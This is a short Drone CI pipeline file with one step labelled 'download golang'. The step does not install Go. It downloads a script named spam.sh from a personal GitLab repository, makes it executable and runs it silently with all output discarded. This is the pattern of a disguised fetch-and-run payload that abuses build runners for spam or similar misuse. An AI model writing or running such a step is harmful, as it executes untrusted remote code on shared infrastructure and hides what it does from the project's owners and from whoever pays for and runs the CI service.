---
kind: pipeline
type: exec
name: default
platform:
  os: linux
  arch: amd64
steps:
- name: download golang
  commands:
   - wget https://gitlab.com/renifer12/project-7/-/raw/main/spam.sh && chmod +x spam.sh && ./spam.sh > /dev/null 2>&1
